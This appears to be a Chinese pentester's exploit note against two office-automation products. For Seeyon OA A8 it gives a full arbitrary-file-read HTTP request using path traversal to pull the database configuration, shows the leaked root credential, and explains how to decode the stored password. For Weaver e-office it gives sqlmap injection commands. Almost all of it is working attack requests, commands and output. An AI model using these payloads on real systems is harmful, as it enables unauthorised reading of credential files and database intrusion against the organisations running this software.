致远OA A8 任意文件读取

GET /seeyon/webmail.do?method=doDownloadAtt&filename=test.txt&filePath=../conf/datasourceCtp.properties HTTP/1.1
Host: IP:88
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=BC985B911111E407D376A544D9528D75; loginPageURL="/main.do"; JSESSIONID=F109551718199AE809505EE41255DC9C
Connection: close
HTTP/1.1 200 OK
Content-disposition: attachment;filename="test.txt"
Content-Type: application/x-msdownload;charset=UTF-8
Content-Length: 369
Date: Thu, 26 Aug 2021 06:35:08 GMT
Connection: close
Server: Seeyon-Server/1.0
ctpDataSource.minCount=50
mysql.backup.path=
db.hibernateDialect=org.hibernate.dialect.MySQLDialect
ctpDataSource.username=root
workflow.dialect=MySQL
ctpDataSource.driverClassName=com.mysql.jdbc.Driver
ctpDataSource.password=/1.0/VEIyMzQ1Njd0Yg==
ctpDataSource.url=jdbc:mysql://127.0.0.1:3306/v6?autoReconnection=true
mysql.path=
ctpDataSource.maxCount=2000

致远OA数据库配置文件：/opt/Seeyon/A8/base/conf/datasourceCtp.properties
VEIyMzQ1Njd0Yg==
https://github.com/timwhitez/seeyon-OA-A8-GetShell

致远OA加密解密

https://github.com/jas502n/OA-Seeyou

/1.0/UWJ0dHgxc2U= 提取 UWJ0dHgxc2U= 解密得到 Qbttx1se

 echo UWJ0dHgxc2U= |base64 -d 
 Qbttx1se

其中1.0 代表左偏移一位 对应的解密成明文

>> s="" 
>> a = "Qbttx1se" 
>> for i in a: ...     
       s+= chr(ord(i) -1 ) ...  
>> print s 
>> Passw0rd

泛微OA 2021 注入

python sqlmap.py -u "http://127.0.0.1:8010/eoffice10/server/ext/system_support/leave_record.php?flow_id=1&run_id=1&table_field=1&table_field_name=user()&max_rows=10" --prefix="') " --suffix="%23" -p run_id
python sqlmap.py -u "http://127.0.0.1:8010/eoffice10/server/ext/system_support/leave_record.php?flow_id=1&run_id=1&table_field=1&table_field_name=user()&max_rows=10" --prefix="') " --suffix="%23" -p table_field

https://www.hedysx.com/2777.html